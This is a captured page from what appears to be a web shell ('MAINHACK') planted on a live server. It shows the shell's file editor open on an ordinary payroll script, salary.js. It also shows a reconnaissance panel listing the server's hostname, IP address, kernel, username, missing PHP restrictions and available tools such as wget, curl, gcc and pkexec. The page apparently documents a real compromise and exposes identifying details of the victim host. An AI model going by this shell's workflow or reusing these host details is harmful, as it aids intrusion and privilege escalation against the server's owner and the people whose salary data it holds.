[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: salary.js
$(function() { "use strict"; let precision = $('#precision').val(); let account_field_required = $('#account_field_required').val(); //check all checkAll(); //check all function function checkAll() { if ($(".checkbox_user").length == $(".checkbox_user:checked").length) { $(".checkbox_userAll").prop("checked", true); } else { $(".checkbox_userAll").prop("checked", false); } } // Check or Uncheck All checkboxes $(document).on('click', '.checkbox_userAll', function(e){ let checked = $(this).is(':checked'); if (checked) { $(".generated_salary").each(function () { $(this).val('2'); }); $(".checkbox_user").each(function () { let menu_id = $(this).attr('data-menu_id'); $(this).prop("checked", true); $("#qty"+menu_id).val(1); $("#qty"+menu_id).prop("disabled", false); }); $(".checkbox_userAll").prop("checked", true); } else { $(".generated_salary").each(function () { $(this).val('1'); }); $(".checkbox_user").each(function () { let menu_id = $(this).attr('data-menu_id'); $(this).prop("checked", false); $("#qty"+menu_id).prop("disabled", true); $("#qty"+menu_id).val(''); }); $(".checkbox_userAll").prop("checked", false); } }); $(document).on('change', '.checkbox_user', function () { if ($(this).is(':checked')) { $(this).parent().find('.generated_salary').val('2'); } else { $(this).parent().find('.generated_salary').val('1'); } }); function checkCheckboxChecked(){ $('.checkbox_user').each(function () { if ($(this).is(':checked')) { $(this).parent().find('.generated_salary').val('2'); } else { $(this).parent().find('.generated_salary').val('1'); } }); } checkCheckboxChecked(); $(document).on('click', '.checkbox_user', function(e){ let menu_id = $(this).attr('data-menu_id'); if ($(".checkbox_user").length == $(".checkbox_user:checked").length) { $(".checkbox_userAll").prop("checked", true); if($(this).is(':checked')){ $("#qty"+menu_id).val(1); $("#qty"+menu_id).prop("disabled", false); }else{ $("#qty"+menu_id).prop("disabled", true); $("#qty"+menu_id).val(''); } } else { $(".checkbox_userAll").prop("checked", false); if($(this).is(':checked')){ $("#qty"+menu_id).val(1); $("#qty"+menu_id).prop("disabled", false); }else{ $("#qty"+menu_id).prop("disabled", true); $("#qty"+menu_id).val(''); } } }); $(document).on('keyup', '.cal_row', function(e){ //calculate row cal_row(); }); $(document).on('submit', '#add_salary', function() { let payment_id = $('#payment_method_id').val(); let error = false; if(payment_id == ''){ $("#payment_method_id_err_msg").text(account_field_required); $(".payment_method_id_err_msg_contnr").show(200); error == true; return false; } }); //call calculate row cal_row(); function cal_row() { let total = 0; let addition = 0; let subtraction_sum = 0; let total_salary = 0; $(".row_counter").each(function () { let id = $(this).attr("data-id"); let salary = $("#salary_"+id).val(); let additional = $("#additional_"+id).val(); let subtraction = $("#subtraction_"+id).val(); if($.trim(salary) == "" || $.isNumeric(salary) == false){ salary=0; } if($.trim(additional) == "" || $.isNumeric(additional) == false){ additional=0; } if($.trim(subtraction) == "" || $.isNumeric(subtraction) == false){ subtraction=0; } let total_row = parseFloat($.trim(salary)) + parseFloat($.trim(additional)) - parseFloat($.trim(subtraction)); let total_addition = parseFloat($.trim(additional)); let total_subtraction = parseFloat($.trim(subtraction)); total_salary += parseFloat(salary); total+=total_row; addition+=total_addition; subtraction_sum+=total_subtraction; $("#total_"+id).val(Number(total_row).toFixed(precision)); }); $(".total_salary").html(Number(total_salary).toFixed(precision)); $(".total_amount").html(Number(total).toFixed(precision)); $(".total_addition").html(Number(addition).toFixed(precision)); $(".total_subtraction").html(Number(subtraction_sum).toFixed(precision)); } });
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.06 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002